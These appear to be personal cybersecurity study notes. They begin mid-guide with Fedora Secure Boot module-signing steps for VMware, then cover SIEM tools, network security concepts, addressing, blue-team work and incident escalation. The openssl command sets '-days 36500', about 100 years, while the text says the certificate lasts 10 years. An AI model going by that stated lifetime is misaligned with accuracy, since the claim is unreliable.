Create a directory for your keys (for safekeeping):

sudo mkdir -p /root/module-signing
cd /root/module-signing

Generate the public and private keys: Run this command exactly. It creates a certificate valid for 10 years.
```
sudo openssl req -new -x509 -newkey rsa:2048 -keyout MOK.priv -outform DER -out MOK.der -nodes -days 36500 -subj "/CN=VMware/"
```
- MOK.priv: Private key (Keep safe! Used to sign modules).
- MOK.der: Public key (This gets enrolled in your BIOS/EFI).

Phase 2: Enroll the Key in Firmware

You must tell your computer's firmware (BIOS/UEFI) to trust this new key.

Import the public key:
```
sudo mokutil --import MOK.der
```
- It will ask you to create a one-time password. Remember this password; you will need it in the next step.
Reboot your computer:
```
sudo reboot
```
Perform the Enrollment (The "Blue Screen"): During boot, before Fedora loads, you will see a blue screen labeled Shim UEFI key management.
- Press any key to interrupt the boot.
- Select Enroll MOK.
- Select Continue.
- Select Yes.
- Enter the password you created in Step 1.
- Select Reboot.

Phase 3: Sign the Modules

Now that your system trusts the key, you must sign the specific VMware modules. You will need to repeat this phase every time you update your Linux kernel or VMware version.

Locate the sign-file utility: Fedora puts this in the kernel headers.

# Define the signer path variable for easier use
SIGNER="/usr/src/kernels/$(uname -r)/scripts/sign-file"

Locate your VMware modules: They are usually in /lib/modules/$(uname -r)/misc/. (Note: If the files end in .ko.xz, you must decompress them using xz -d before signing, then recompress them. However, manually compiled VMware modules are usually just .ko).
Run the signing commands:

# Sign vmmon
sudo $SIGNER sha256 /root/module-signing/MOK.priv /root/module-signing/MOK.der $(modinfo -n vmmon)

# Sign vmnet
sudo $SIGNER sha256 /root/module-signing/MOK.priv /root/module-signing/MOK.der $(modinfo -n vmnet)

Phase 4: Load and Verify

Load the signed modules:

sudo modprobe vmmon
sudo modprobe vmnet

Verify they are loaded:

lsmod | grep vm

_If you see `vmmon` and `vmnet` in the output, you are successful._

2. Restart VMware Service:

sudo systemctl restart vmware.service

Troubleshooting

"Key rejected by service": This means the enrollment in Phase 2 didn't happen correctly. Run mokutil --test MOK.der to see if the key is enrolled. If it says "not enrolled," try Phase 2 again.
"File not found": Ensure you have kernel-devel installed (sudo dnf install kernel-devel). The sign-file tool is part of that package.

[Vault: Defence and Response] SIEM

Sun, 14 Dec 2025 11:34:22 GMT

Security Information and Event Management tools (SIEM tools)

A SIEM tool is an application that collects and analyzes log data to monitor critical activities in an organization. SIEM tools collect real-time, or instant, information, and allow security analysts to identify potential breaches as they happen. eg: [[Splunk]], Google's Chronicle

A log is a record of events that occur within an organization's systems. ^a16bc1
A firewall log is a record of attempted or established connections for incoming traffic from the internet. It also includes outbound requests to the internet from within the network.
A network log is a record of all computers and devices that enter and leave the network. It also records connections between devices and services on the network.
A server log is a record of events related to services such as websites, emails, or file shares. It includes actions such as login, password, and username requests.

Metrics: key technical attributes such as response time, availability, and failure rate, which are used to assess the performance of a software application.

Benefits of SIEM

Access to event data: SIEM tools provide access to the event and activity data that happens on a network, including real-time activity. Networks can be connected to hundreds of different systems and devices. SIEM tools have the ability to ingest all of this data so that it can be accessed.
Monitoring, detecting, and alerting: SIEM tools continuously monitor systems and networks in real-time. They then analyze the collected data using detection rules to detect malicious activity. If an activity matches the rule, an alert is generated and sent out for security teams to assess.
Log storage: SIEM tools can act as a system for data retention, which can provide access to historical data. Data can be kept or deleted after a period depending on an organization's requirements.

SIEM process

1. Collect and aggregate data

SIEM tools require data for them to be effectively used. During the first step, the SIEM collects event data / logs from various sources like firewalls, servers, routers, and more. This data contains event details like timestamps, IP addresses, and more. After all of this log data is collected, it gets aggregated in one location. Aggregation refers to the process of consolidating log data into a centralized place. Through collection and aggregation, SIEM tools eliminate the need for manually reviewing and analyzing event data by accessing individual data sources. Instead, all event data is accessible in one location—the SIEM. Parsing can occur during the first step of the SIEM process when data is collected and aggregated. Parsing maps data according to their fields and their corresponding values.

2. Normalize data

SIEM tools collect data from many different sources. This data must be transformed into a single format so that it can be easily processed by the SIEM. However, each data source is different and data can be formatted in many different ways. For example, a firewall log can be formatted differently than a server log. Collected event data should go through the process of normalization. Normalization converts data into a standard, structured format that is easily searchable.

3. Analyze data

After log data has been collected, aggregated, and normalized, the SIEM must do something useful with all of the data to enable security teams to investigate threats. During this final step in the process, SIEM tools analyze the data. Analysis can be done with some type of detection logic such as a set of rules and conditions. SIEM tools then apply these rules to the data, and if any of the log activity matches a rule, alerts are sent out to cybersecurity teams.

Security orchestration, automation, and response (SOAR) is a collection of applications, tools, and workflows that uses automation to respond to security events.

Different types of SIEM tools

Self hosted
Cloud
Hybrid

Common SIEM tools

[[Splunk]]
Chronicle is Google's cloud-native tool designed to retain, analyze, and search data. Chronicle provides log monitoring, data analysis, and data collection. It is specifically designed to take advantage of cloud computing capabilities including availability, flexibility, and scalability. (Now Google SecOps)
Suricata
- Suricata is an open-source network analysis and threat detection software.
- Suricata was developed by the Open Information Security Foundation (OISF).
AlienVault® OSSIM™
Elastic
Exabeam
IBM QRadar® Security Intelligence Platform
LogRhythm
[[Wazuh]]

[[SIEM tools|SIEM Dashboards]]

Log Injestion

Data is required for SIEM tools to work effectively. SIEM tools must first collect data using log ingestion. Log ingestion is the process of collecting and importing data from log sources into a SIEM tool. Data comes from any source that generates log data, like a server.

In log ingestion, the SIEM creates a copy of the event data it receives and retains it within its own storage. This copy allows the SIEM to analyze and process the data without directly modifying the original source logs. The collection of event data provides a centralized platform for security analysts to analyze the data and respond to incidents. This event data includes authentication attempts, network activity, and more.

Log forwarders

Log forwarders are software that automate the process of collecting and sending log data. Manually uploading data may be inefficient and time-consuming because networks can contain thousands of systems and devices. Hence, it's easier to use software that helps collect data. Some operating systems have native log forwarders. If you are using an operating system that does not have a native log forwarder, you would need to install a third-party log forwarding software on a device. After installing it, you'd configure the software to specify which logs to forward and where to send them.

Searching

Different SIEM tools use different search methods. Splunk uses its own query language called Search Processing Language, or SPL for short. SPL has many different search options you can use to optimize search results, so that you can get the data you're looking for.

Chronicle uses the YARA-L language to define rules for detection. It's a computer language used to create rules for searching through ingested log data. For example, you can use YARA-L to write a rule to detect specific activities related to the exfiltration of valuable data. Using Chronicle's search field, you can search for fields like hostname, domain, IP, URL, email, username, or file hash. The default method of search is using UDM search, which stands for Unified Data Model. It searches through normalized data. If you can't find the data you're looking for searching the normalized data, you have the option of searching raw logs. Raw log search searches through the logs which have not been normalized.

Splunk’s Search Manual on how to use the Splunk search processing language (SPL)
Google Security Operations quickstart guide on the different types of searches.

[Vault: Defence and Response] SIEM tools

Sun, 14 Dec 2025 11:34:22 GMT

Splunk

[[Splunk]] offers different SIEM tool options: Splunk® Enterprise and Splunk® Cloud. Both allow you to review an organization's data on dashboards. This helps security professionals manage an organization's internal infrastructure by collecting, searching, monitoring, and analyzing log data from multiple sources to obtain full visibility into an organization’s everyday operations. Review the following Splunk dashboards and their purposes:

Security posture dashboard

The security posture dashboard is designed for security operations centers (SOCs). It displays the last 24 hours of an organization’s notable security-related events and trends and allows security professionals to determine if security infrastructure and policies are performing as designed. Security analysts can use this dashboard to monitor and investigate potential threats in real time, such as suspicious network activity originating from a specific IP address.

Executive summary dashboard

The executive summary dashboard analyzes and monitors the overall health of the organization over time. This helps security teams improve security measures that reduce risk. Security analysts might use this dashboard to provide high-level insights to stakeholders, such as generating a summary of security incidents and trends over a specific period of time.

Incident review dashboard

The incident review dashboard allows analysts to identify suspicious patterns that can occur in the event of an incident. It assists by highlighting higher risk items that need immediate review by an analyst. This dashboard can be very helpful because it provides a visual timeline of the events leading up to an incident.

Risk analysis dashboard

The risk analysis dashboard helps analysts identify risk for each risk object (e.g., a specific user, a computer, or an IP address). It shows changes in risk-related activity or behavior, such as a user logging in outside of normal working hours or unusually high network traffic from a specific computer. A security analyst might use this dashboard to analyze the potential impact of vulnerabilities in critical assets, which helps analysts prioritize their risk mitigation efforts.

Chronicle

Chronicle is a cloud-native SIEM tool from Google that retains, analyzes, and searches log data to identify potential security threats, risks, and vulnerabilities. Chronicle allows you to collect and analyze log data according to:

A specific asset
A domain name
A user
An IP address Chronicle provides multiple dashboards that help analysts monitor an organization’s logs, create filters and alerts, and track suspicious domain names. Review the following Chronicle dashboards and their purposes:

Enterprise insights dashboard

The enterprise insights dashboard highlights recent alerts. It identifies suspicious domain names in logs, known as indicators of compromise (IOCs). Each result is labeled with a confidence score to indicate the likelihood of a threat. It also provides a severity level that indicates the significance of each threat to the organization. A security analyst might use this dashboard to monitor login or data access attempts related to a critical asset—like an application or system—from unusual locations or devices.

Data ingestion and health dashboard

The data ingestion and health dashboard shows the number of event logs, log sources, and success rates of data being processed into Chronicle. A security analyst might use this dashboard to ensure that log sources are correctly configured and that logs are received without error. This helps ensure that log related issues are addressed so that the security team has access to the log data they need.

IOC matches dashboard

The IOC matches dashboard indicates the top threats, risks, and vulnerabilities to the organization. Security professionals use this dashboard to observe domain names, IP addresses, and device IOCs over time in order to identify trends. This information is then used to direct the security team’s focus to the highest priority threats. For example, security analysts can use this dashboard to search for additional activity associated with an alert, such as a suspicious user login from an unusual geographic location.

Main dashboard

The main dashboard displays a high-level summary of information related to the organization’s data ingestion, alerting, and event activity over time. Security professionals can use this dashboard to access a timeline of security events—such as a spike in failed login attempts— to identify threat trends across log sources, devices, IP addresses, and physical locations.

Rule detections dashboard

The rule detections dashboard provides statistics related to incidents with the highest occurrences, severities, and detections over time. Security analysts can use this dashboard to access a list of all the alerts triggered by a specific detection rule, such as a rule designed to alert whenever a user opens a known malicious attachment from an email. Analysts then use those statistics to help manage recurring incidents and establish mitigation tactics to reduce an organization's level of risk.

User sign in overview dashboard

The user sign in overview dashboard provides information about user access behavior across the organization. Security analysts can use this dashboard to access a list of all user sign-in events to identify unusual user activity, such as a user signing in from multiple locations at the same time. This information is then used to help mitigate threats, risks, and vulnerabilities to user accounts and the organization’s applications.

[Vault: Networking] Network Security

Wed, 10 Dec 2025 10:32:45 GMT

Firewall

A firewall is a network security device that monitors traffic to and from your network. It either allows traffic or it blocks it based on a defined set of security rules. Port filtering: A firewall function that blocks or allows certain port numbers to limit unwanted communication A hardware firewall inspects each data packet before it's allowed to enter the network. A software firewall performs the same functions as a hardware firewall, but it's not a physical device. Instead, it's a software program installed on a computer or on a server. If the software firewall is installed on a computer, it will analyze all the traffic received by that computer. If the software firewall is installed on a server, it will protect all the devices connected to the server. Cloud service providers offer firewalls as a service, or FaaS, for organizations. Cloud-based firewalls are software firewalls hosted by a cloud service provider. All the firewalls we have discussed can be either stateful or stateless. Stateful refers to a class of firewall that keeps track of information passing through it and proactively filters out threats. A stateful firewall analyzes network traffic for characteristics and behavior that appear suspicious and stops them from entering the network. Stateless refers to a class of firewall that operates based on predefined rules and does not keep track of information from data packets. A stateless firewall only acts according to preconfigured rules set by the firewall administrator. A stateless firewall doesn't store analyzed information. It also doesn't discover suspicious trends like a stateful firewall does. For this reason, stateless firewalls are considered less secure than stateful firewalls. A next generation firewall, or NGFW, provides even more security than a stateful firewall. Not only does an NGFW provide stateful inspection of incoming and outgoing traffic, but it also performs more in-depth security functions like deep packet inspection and intrusion protection. Some NGFWs connect to cloud-based threat intelligence services so they can quickly update to protect against emerging cyber threats.

VPN

A virtual private network, also known as a VPN, is a network security service that changes your public IP address and hides your virtual location so that you can keep your data private when you're using a public network like the internet. VPNs also encrypt your data as it travels across the internet to preserve confidentiality. A VPN service performs encapsulation on your data in transit. Encapsulation is a process performed by a VPN service that protects your data by wrapping sensitive data in other data packets. Security zones are a segment of a network that protects the internal network from the internet. They are a part of a security technique called network segmentation that divides the network into segments. Each network segment has its own access permissions and security rules. Security zones control who can access different segments of a network. Security zones act as a barrier to internal networks, maintain privacy within corporate groups, and prevent issues from spreading to the whole network. An organization's network is classified into two types of security zones. First, there's the uncontrolled zone, which is any network outside of the organization's control, like the internet. Then, there's the controlled zone, which is a subnet that protects the internal network from the uncontrolled zone. There are several types of networks within the controlled zone. On the outer layer is the demilitarized zone, or DMZ, which contains public-facing services that can access the internet. This includes web servers, proxy servers that host websites for the public, and DNS servers that provide IP addresses for internet users. It also includes email and file servers that handle external communications. The DMZ acts as a network perimeter to the internal network. The internal network contains private servers and data that the organization needs to protect. Inside the internal network is another zone called the restricted zone. The restricted zone protects highly confidential information that is only accessible to employees with certain privileges. Subnetting is the subdivision of a network into logical groups called subnets. It works like a network inside a network. Subnetting divides up a network address range into smaller subnets within the network. These smaller subnets form based on the IP addresses and network mask of the devices on the network. Subnetting creates a network of devices to function as their own network. This makes the network more efficient and can also be used to create security zones. If devices on the same subnet communicate with each other, the switch changes the transmissions to stay on the same subnet, improving speed and efficiency of the communications.

VPN protocols: Wireguard and IPSec

Remote access and site-to-site VPNs

Individual users use remote access VPNs to establish a connection between a personal device and a VPN server. Remote access VPNs encrypt data sent or received through a personal device. The connection between the user and the remote access VPN is established through the internet.

Enterprises use site-to-site VPNs largely to extend their network to other networks and locations. This is particularly useful for organizations that have many offices across the globe. IPSec is commonly used in site-to-site VPNs to create an encrypted tunnel between the primary network and the remote network. One disadvantage of site-to-site VPNs is how complex they can be to configure and manage compared to remote VPNs.

WireGuard VPN vs. IPSec VPN

WireGuard and IPSec are two different VPN protocols used to encrypt traffic over a secure network tunnel. The majority of VPN providers offer a variety of options for VPN protocols, such as WireGuard or IPSec. Ultimately, choosing between IPSec and WireGuard depends on many factors, including connection speeds, compatibility with existing network infrastructure, and business or individual needs.

WireGuard VPN

WireGuard is a high-speed VPN protocol, with advanced encryption, to protect users when they are accessing the internet. It’s designed to be simple to set up and maintain. WireGuard can be used for both site-to-site connection and client-server connections. WireGuard is relatively newer than IPSec, and is used by many people due to the fact that its download speed is enhanced by using fewer lines of code. WireGuard is also open source, which makes it easier for users to deploy and debug. This protocol is useful for processes that require faster download speeds, such as streaming video content or downloading large files.

IPSec VPN

IPSec is another VPN protocol that may be used to set up VPNs. Most VPN providers use IPSec to encrypt and authenticate data packets in order to establish secure, encrypted connections. Since IPSec is one of the earlier VPN protocols, many operating systems support IPSec from VPN providers.

Although IPSec and WireGuard are both VPN protocols, IPSec is older and more complex than WireGuard. Some clients may prefer IPSec due to its longer history of use, extensive security testing, and widespread adoption. However, others may prefer WireGuard because of its potential for better performance and simpler configuration.

Proxy servers

Proxy servers are another system that helps secure networks. The definition of a proxy server is a server that fulfills the request of a client by forwarding them on to other servers. The proxy server is a dedicated server that sits between the internet and the rest of the network. When a request to connect to the network comes in from the internet, the proxy server will determine if the connection request is safe. The proxy server is a public IP address that is different from the rest of the private network. This hides the private network's IP address from malicious actors on the internet and adds a layer of security. There are different types of proxy servers that support network security. A forward proxy server regulates and restricts a person with access to the internet. The goal is to hide a user's IP address and approve all outgoing requests. In the context of an organization, a forward proxy server receives outgoing traffic from an employee, approves it, and then forwards it on to the destination on the internet. A [[Reverse Proxy]] server regulates and restricts the internet access to an internal server. The goal is to accept traffic from external parties, approve it, and forward it to the internal servers. This setup is useful for protecting internal web servers containing confidential data from exposing their IP address to external parties. An email proxy server is another valuable security tool. It filters spam email by verifying whether a sender's address was forged. This reduces the risk of phishing attacks that impersonate people known to the organization.

Network interception attacks

Network interception attacks work by intercepting network traffic and stealing valuable information or interfering with the transmission in some way. Malicious actors can use hardware or software tools to capture and inspect data in transit. This is referred to as packet sniffing

Backdoor attacks

backdoors are weaknesses intentionally left by programmers or system and network administrators that bypass normal access control mechanisms. Backdoors are intended to help programmers conduct troubleshooting or administrative tasks. However, backdoors can also be installed by attackers after they’ve compromised an organization to ensure they have persistent access.

[[DoS and DDoS Attacks]]

Packet sniffing

Packet sniffing is the practice of using software tools to observe data as it moves across a network. Passive packet sniffing is a type of attack where data packets are read in transit. Since all the traffic on a network is visible to any host on the hub, malicious actors can view all the information going in and out of the device they are targeting. Active packet sniffing is a type of attack where data packets are manipulated in transit. This may include injecting internet protocols to redirect the packets to an unintended port or changing the information the packet contains.

IP Spoofing

IP spoofing is a network attack performed when an attacker changes the source IP of a data packet to impersonate an authorized system and gain access to a network. In this kind of attack, the hacker is pretending to be someone they are not so they can communicate over the network with the target computer and get past firewall rules that may prevent outside traffic. Some common IP spoofing attacks are on-path attacks, replay attacks, and smurf attacks.

An on-path attack is an attack where the malicious actor places themselves in the middle of an authorized connection and intercepts or alters the data in transit. On-path attackers gain access to the network and put themselves between two devices, like a web browser and a web server. Then they sniff the packet information to learn the IP and MAC addresses to devices that are communicating with each other. After they have this information, they can pretend to be either of these devices.
A replay attack is a network attack performed when a malicious actor intercepts a data packet in transit and delays it or repeats it at another time. A delayed packet can cause connection issues between target computers, or a malicious actor may take a network transmission that was sent by an authorized user and repeat it at a later time to impersonate the authorized user.
A smurf attack is a combination of a DDoS attack and an IP spoofing attack. The attacker sniffs an authorized user's IP address and floods it with packets. This overwhelms the target computer and can bring down a server or the entire network. Firewalls can be configured to protect against IP spoofing. IP spoofing makes it seem like the malicious actor is an authorized user by changing the sender's address of the data packet to match the target network's address. So if a firewall receives a data packet from the internet where the sender's IP address is the same as the private network, then the firewall will deny the transmission since all the devices with that IP address should already be on the local network. You can make sure that your firewalls configure correctly by creating a rule to reject all incoming traffic that has the same IP address as the local network. The device’s Network Interface Card (NIC) is a piece of hardware that connects the device to a network. The NIC reads the data transmission, and if it contains the device’s MAC address, it accepts the packet and sends it to the device to process the information based on the protocol. This occurs in all standard network operations. However, a NIC can be set to promiscuous mode, which means that it accepts all traffic on the network, even the packets that aren’t addressed to the NIC’s device.Malicious actors might use software like Wireshark to capture the data on a private network and store it for later use. They can then use the personal information to their own advantage. Alternatively, they might use the IP and MAC addresses of authorized users of the private network to perform IP spoofing.

Security hardening

Security hardening is the process of strengthening a system to reduce its vulnerability and attack surface. All the potential vulnerabilities that a threat actor could exploit are referred to as a system's attack surface. Security hardening can be conducted on any device or system that can be compromised, such as hardware, operating systems, applications, computer networks, and databases. Physical security is also a part of security hardening. Some common types of hardening procedures include software updates, also called patches, and device application configuration changes. These updates and changes are done to increase security and fix security vulnerabilities on a network.Other examples of security hardening include removing or disabling unused applications and services, disabling unused ports, and reducing access permissions across devices and network.

OS hardening

It's important to secure the OS in each system because one insecure OS can lead to a whole network being compromised.

A patch update is a software and operating system, or OS, update that addresses security vulnerabilities within a program or product. With patch updates, the OS should be upgraded to its latest software version. Sometimes patches are released to fix a security vulnerability in the software.
The newly updated OS should be added to the baseline configuration, also called the baseline image. A baseline configuration is a documented set of specifications within a system that is used as a basis for future builds, releases, and updates.
hardware and software disposal. This ensures that all old hardware is properly wiped and disposed of.
implementing a strong password policy. [[Brute force attacks]]

Network hardening'

Network hardening focuses on network-related security hardening, like port filtering, network access privileges, and encryption over networks. Certain network hardening tasks are performed regularly, while others are performed once and then updated as needed. tasks that are regularly performed are firewall rules maintenance, network log analysis, patch updates, and server backups. tasks that are performed once. These tasks include port filtering on firewalls, network access privileges, and encryption for communication,

Port filtering can be formed over the network. Port filtering is a firewall function that blocks or allows certain port numbers to limit unwanted communication. A basic principle is that the only ports that are needed are the ones that are allowed. Any port that isn't being used by the normal network operations should be disallowed
Security analysts also use network segmentation to create isolated subnets for different departments in an organization.
Network segmentation may also be used to separate different security zones. Any restricted zone on a network containing highly classified or confidential data should be separate from the rest of the network.
![[attachments/Network-Security-img-202510091530.png|500x0]]

Intrusion Prevention System

An intrusion prevention system (IPS) is an application that monitors system activity for intrusive activity and takes action to stop the activity. It offers even more protection than an IDS because it actively stops anomalies when they are detected, unlike the IDS that simply reports the anomaly to a network administrator.

|Devices / Tools|Advantages|Disadvantages| |---|---|---| |Firewall|A firewall allows or blocks traffic based on a set of rules.|A firewall is only able to filter packets based on information provided in the header of the packets.| |Intrusion Detection System (IDS)|An IDS detects and alerts admins about possible intrusions, attacks, and other malicious traffic.|An IDS can only scan for known attacks or obvious anomalies; new and sophisticated attacks might not be caught. It doesn’t actually stop the incoming traffic.| |Intrusion Prevention System (IPS)|An IPS monitors system activity for intrusions and anomalies and takes action to stop them.|An IPS is an inline appliance. If it fails, the connection between the private network and the internet breaks. It might detect false positives and block legitimate traffic.| |Security Information and Event Management (SIEM)|A SIEM tool collects and analyzes log data from multiple network machines. It aggregates security events for monitoring in a central dashboard.|A SIEM tool only reports on possible security issues. It does not take any actions to stop or prevent suspicious events.|

Cloud hardening

Although cloud servers are hosted by a cloud service provider, these providers cannot prevent intrusions in the cloud—especially intrusions from malicious actors, both internal and external to an organization. One distinction between cloud network hardening and traditional network hardening is the use of a server baseline image for all server instances stored in the cloud. This allows you to compare data in the cloud servers to the baseline image to make sure there haven't been any unverified changes.

Identity access management (IAM): is a collection of processes and technologies that helps organizations manage digital identities in their environment. This service also authorizes how users can use different cloud resources.
Configuration: The number of available cloud services adds complexity to the network. Each service must be carefully configured to meet security and compliance requirements.
Attack surface: Every service or application on a network carries its own set of risks and vulnerabilities and increases an organization’s overall attack surface. An increased attack surface must be compensated for with increased security measures.
Zero-day attacks: is an exploit that was previously unknown. CSPs are more likely to know about a zero day attack occurring before a traditional IT organization does. CSPs have ways of patching hypervisors and migrating workloads to other virtual machines. These methods ensure the customers are not impacted by the attack.
Visibility and tracking: Network administrators have access to every data packet crossing the network with both on-premise and cloud networks. They can sniff and inspect data packets to learn about network performance or to check for possible threats and attacks.
Things change fast in the cloud: CSPs are large organizations that work hard to stay up-to-date with technology advancements. Cloud service updates can affect security considerations for the organizations using them.Organizations that use CSPs usually have to update their IT processes.
Shared responsibility model: states that the CSP must take responsibility for security involving the cloud infrastructure, including physical data centers, hypervisors, and host operating systems. The company using the cloud service is responsible for the assets and processes that they store or operate in the cloud.

### Hypervisors

A hypervisor abstracts the host’s hardware from the operating software environment. There are two types of hypervisors. Type one hypervisors run on the hardware of the host computer. An example of a type one hypervisor is VMware®'s ESXi. Type two hypervisors operate on the software of the host computer. An example of a type two hypervisor is VirtualBox. Cloud service providers (CSPs) commonly use type one hypervisors. CSPs are responsible for managing the hypervisor and other virtualization components. The CSP ensures that cloud resources and cloud environments are available, and it provides regular patches and updates. Vulnerabilities in hypervisors or misconfigurations can lead to virtual machine escapes (VM escapes). A VM escape is an exploit where a malicious actor gains access to the primary hypervisor, potentially the host computer and other VMs. As a CSP customer, you will rarely deal with hypervisors directly.

Baselining

Baselining for cloud networks and operations cover how the cloud environment is configured and set up. A baseline is a fixed reference point. This reference point can be used to compare changes made to a cloud environment. Proper configuration and setup can greatly improve the security and performance of a cloud environment. Examples of establishing a baseline in a cloud environment include: restricting access to the admin portal of the cloud environment, enabling password management, enabling file encryption, and enabling threat detection services for SQL databases.

Cryptography in the cloud

Cryptography can be applied to secure data that is processed and stored in a cloud environment. Cryptography uses encryption and secure key management systems to provide data integrity and confidentiality. Cryptographic encryption is one of the key ways to secure sensitive data and information in the cloud.

Cryptographic erasure

Cryptographic erasure is a method of erasing the encryption key for the encrypted data. When destroying data in the cloud, more traditional methods of data destruction are not as effective. Crypto-shredding is a newer technique where the cryptographic keys used for decrypting the data are destroyed. This makes the data undecipherable and prevents anyone from decrypting the data. When crypto-shredding, all copies of the key need to be destroyed so no one has any opportunity to access the data in the future.

Key Management

Modern encryption relies on keeping the encryption keys secure. Below are the measures you can take to further protect your data when using cloud applications:

Trusted platform module (TPM). TPM is a computer chip that can securely store passwords, certificates, and encryption keys.
Cloud hardware security module (CloudHSM). CloudHSM is a computing device that provides secure storage for cryptographic keys and processes cryptographic operations, such as encryption and decryption.
Organizations and customers do not have access to the cloud service provider (CSP) directly, but they can request audits and security reports by contacting the CSP. Customers typically do not have access to the specific encryption keys that CSPs use to encrypt the customers’ data. However, almost all CSPs allow customers to provide their own encryption keys, depending on the service the customer is accessing. In turn, the customer is responsible for their encryption keys and ensuring the keys remain confidential. The CSP is limited in how they can help the customer if the customer’s keys are compromised or destroyed. One key benefit of the shared responsibility model is that the customer is not entirely responsible for maintenance of the cryptographic infrastructure. Organizations can assess and monitor the risk involved with allowing the CSP to manage the infrastructure by reviewing a CSPs audit and security controls. For federal contractors, FEDRAMP provides a list of verified CSPs.

[Vault: Networking] IP and MAC Addresses

Tue, 09 Dec 2025 21:43:36 GMT

IP address

An internet protocol address, or IP address, is a unique string of characters that identifies a location of a device on the internet. 2 Types of IP addresses

IPv4
IPv6

Difference between IPv4 and IPv6

In an earlier part of this course, you learned about the history of IP addressing. As the internet grew, it became clear that all of the IPv4 addresses would eventually be depleted; this is called IPv4 address exhaustion. At the time, no one had anticipated how many computing devices would need an IP address. IPv6 was developed to mitigate IPv4 address exhaustion and other related concerns.

Some of the key differences between IPv4 and IPv6 include the length and the format of the addresses. IPv4 addresses are made up of four decimal numbers separated by periods, each number ranging from 0 to 255. Together the numbers span 4 bytes, and allow for up to 4.3 billion possible addresses. An example of an IPv4 address would be: 198.51.100.0.

IPv6 addresses are made of eight hexadecimal numbers separated by colons, each number consisting of up to four hexadecimal digits. Together, all numbers span 16 bytes, and allow for up to 340 undecillion addresses (340 followed by 36 zeros). An example of an IPv6 address would be: 2002:0db8:0000:0000:0000:ff21:0023:1234.

Note: _to represent one or more consecutive sets of all zeros, you can replace the zeros with a double colon "::", so the above IPv6 address would be "_2002:0db8::ff21:0023:1234."

There are also some differences in the layout of an IPv6 packet header. The IPv6 header format is much simpler than IPv4. For example, the IPv4 Header includes the IHL, Identification, and Flags fields, whereas the IPv6 does not. The IPv6 header only introduces the Flow Label field, where the Flow Label identifies a packet as requiring special handling by other IPv6 routers.

![[attachments/IP-and-MAC-Addresses-img-202510091530-2.png]] There are some important security differences between IPv4 and IPv6. IPv6 offers more efficient routing and eliminates private address collisions that can occur on IPv4 when two devices on the same network are attempting to use the same address. ![[attachments/IP-and-MAC-Addresses-img-202510091530-3.png]]

MAC address

A MAC address is a unique alphanumeric identifier that is assigned to each physical device on a network. When a switch receives a data packet, it reads the MAC address of the destination device and maps it to a port. It then keeps this information in a MAC address table. Think of the MAC address table like an address book that the switch uses to direct data packets to the appropriate device. Format of MAC address ![[attachments/IP-and-MAC-Addresses-img-202510091530-4.png]] The first three blocks of characters represent the manufacturer of the device. In the above example, the device is Apple, and the last three blocks are random numbers that should be unique to the device.

If IP address 192.168.1.15 wanted to talk to 192.168.1.22, it would first have to send out an ARP (Address Resolution Protocol) request. This request would get sent to every device on the network. Once the device with the IP address 192.168.1.22 received the request, it would send back an ARP Reply message saying 192.168.1.22 has the hardware address 44:F2:1B:83:11:7A. Now communication can commence. Once devices have received an ARP Reply message, they don't need to keep on asking for the MAC address as the computer keeps it in a local database called an ARP Cache. ![[attachments/IP-and-MAC-Addresses-img-202510091530-5.png]]

[Vault: Defence and Response] Blue team

Tue, 09 Dec 2025 17:40:42 GMT

A blue team is a corporate security team that defends the organization against cybersecurity threats (that is, the security operation center analysts, computer security incident response teams (CSIRTs) , information security (InfoSec) teams, and others).

Security Analysts

Security analysts are responsible for monitoring and protecting information and systems. 3 primary responsibilities

Protecting computer and network systems
Install prevention software
Conducting periodic security audits

Playbooks

A manual that provides details about any operational action. Playbooks can pertain to security or compliance reviews, access management, and many other organizational tasks that require a documented process from beginning to end. Playbooks ensure that people follow a consistent list of actions in a prescribed way, regardless of who is working on the case. Playbooks also clarify what tools should be used in response to a security incident.

chain of custody playbook.
protecting and preserving evidence playbook.

[[Incident Response#Incident response playbook|Incident Response Playbook]]

Business continuity planning

Security teams must be prepared to minimize the impact that security incidents can have on their normal business operations. When an incident occurs, organizations might experience significant disruptions to the functionality of their systems and services. Prolonged disruption to systems and services can have serious effects, causing legal, financial, and reputational damages. Organizations can use business continuity planning so that they can remain operational during any major disruptions.

Similar to an incident response plan, a business continuity plan (BCP) is a document that outlines the procedures to sustain business operations during and after a significant disruption. A BCP helps organizations ensure that critical business functions can resume or can be quickly restored when an incident occurs. Here are four essential steps for business continuity plans:

Conduct a business impact analysis. The business impact analysis step focuses on the possible effects a disruption of business functions can have on an organization.
Identify, document, and implement steps to recover critical business functions and processes. This step helps the business continuity team create actionable steps toward responding to a security event.
Organize a business continuity team. This step brings various members of the organization together to help execute the business continuity plan, if it is needed. The members of this team are typically from the cybersecurity, IT, HR, communications, and operations departments.
Conduct training for the business continuity team. The team considers different risk scenarios and prepares for security threats during these training exercises.

Disaster recovery plan

A disaster recovery plan allows an organization’s security team to outline the steps needed to minimize the impact of a security incident, such as a successful ransomware attack that has stopped the manufacturing team from retrieving certain data. It also helps the security team resolve the security threat. A disaster recovery plan is typically created alongside a business continuity plan. Steps to create a disaster recovery plan should include:

Implementing recovery strategies to restore software
Implementing recovery strategies to restore hardware functionality
Identifying applications and data that might be impacted after a security incident has taken place

Site resilience

Resilience is the ability to prepare for, respond to, and recover from disruptions. Organizations can design their systems to be resilient so that they can continue delivering services despite facing disruptions. An example is site resilience, which is used to ensure the availability of networks, data centers, or other infrastructure when a disruption happens. There are three types of recovery sites used for site resilience:

Hot sites: A fully operational facility that is a duplicate of an organization's primary environment. Hot sites can be activated immediately when an organization's primary site experiences failure or disruption.
Warm sites: A facility that contains a fully updated and configured version of the hot site. Unlike hot sites, warm sites are not fully operational and available for immediate use but can quickly be made operational when a failure or disruption occurs.
Cold sites: A backup facility equipped with some of the necessary infrastructure required to operate an organization's site. When a disruption or failure occurs, cold sites might not be ready for immediate use and might need additional work to be operational.

[Vault: GRC] Incident Escalation

Tue, 09 Dec 2025 17:40:42 GMT

Incident escalation

Security incident escalation is the process of identifying a potential security incident. During this process, potential incidents are transferred to a more experienced department or team member. As a security analyst, you’ll be expected to recognize potential issues, such as when an employee excessively enters the wrong credentials to their account, and report it to the appropriate person. When you join a new organization, you’ll learn about the specific processes and procedures for escalating incidents.

Notification of breaches

Many countries have breach notification laws, so it's important to familiarize yourself with the laws applicable in the area your company is operating in. Breach notification laws require companies and government entities to notify individuals of security breaches involving personally identifiable information (PII). PII includes personal identification numbers (e.g., Social Security numbers, driver’s license numbers, etc.), medical records, addresses, and other sensitive customer information.

Escalation Policy

Aset of actions that outline who should be notified when an incident alert occurs and how that incident should be handled

